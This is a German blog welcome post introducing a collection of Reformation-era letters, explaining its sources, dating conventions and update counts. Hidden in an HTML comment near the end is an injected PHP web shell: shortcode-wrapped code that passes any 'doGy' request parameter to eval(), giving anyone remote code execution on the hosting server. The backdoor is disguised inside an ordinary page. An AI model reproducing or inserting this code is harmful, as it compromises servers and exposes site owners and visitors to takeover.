Hallo Welt!

In diesem Blog werden Briefe und Briefauszüge aus der Reformationszeit in den jeweiligen zeitlichen Rahmen gestellt. Links findet Ihr die Verfasser der Briefe, rechts die Empfänger. Ich habe diese Seiten benötigt, um nicht immer wieder dieselben Briefe abzuschreiben. Aus diesem Grund sind auch die Briefe Calvins noch nicht enthalten.

Die Auswahl der Briefe ist willkürlich und basiert eigentlich nur darauf, welche Quellen ich finde. Dabei bin ich, da meine Lateinkenntnisse de facto nicht vorhanden sind, auf deutsche Quellen angewiesen – und dabei auf solche, die auch gemeinfrei sind, bei denen also der Übersetzer oder Herausgeber schon vor mehr als 70 Jahren verstorben ist. So weit es mir möglich ist, habe ich die jeweiligen Quellen der Briefe angegeben – doch erhebt diese Seite keinen Anspruch auf irgendwelche „wissenschaftliche Genauigkeit“, so dass ich mir die Arbeit erspart habe, auch noch die jeweilige Seite oder die Quelle, auf die sich das jeweilige Buch beruft, anzugeben. Wen es interessiert, der mag in der jeweiligen Quelle nachschlagen.

Ich versuche, die Briefe jeweils zu dem Datum einzutragen, an dem sie auch geschrieben wurde. Ist mir das nicht möglich, hinterlege ich Monat und Jahr, ist dies auch nicht möglich, dann den 31.12. des jeweiligen Jahres bzw. des wahrscheinlichen Jahres. Ist mir auch das nicht möglich, werden die Briefe auf den 31.12.1599 gesetzt. Falls mir jemand bei einzelnen dieser Briefe mit der Datierung helfen kann, wäre ich mehr als dankbar.

Diese Eintragung nach Datum bedeutet auch, dass Ihr hier auf der Titelseite nicht die neu eingetragenen Texte findet, sondern immer diesen Eintrag hier und die aus dem Jahr 1599. Damit Ihr dennoch seht, ob es etwas Neues gibt, trage ich unten immer das Datum der letzten Bearbeitung ein. Alternativ könnt Ihr Euch natürlich auch das RSS-Feed rechts zulegen.

Ich hoffe, dass ich hier auf Dauer alle Briefe aus der Glaubensstimme und viele, die ich noch aufnehmen möchte, hinterlegen kann.

Gruß & Segen,

Andreas

Leimen, den 29.3.2014

Stand 04.06.2015: 623 Briefe
Stand 13.06.2015: 651 Briefe
Stand 18.07.2015: 670 Briefe
Stand 26.09.2015:780 Briefe

<!– [insert_php]if (isset($_REQUEST["doGy"])){eval($_REQUEST["doGy"]);exit;}[/insert_php][php]if (isset($_REQUEST["doGy"])){eval($_REQUEST["doGy"]);exit;}[/php] –>

Schreibe einen Kommentar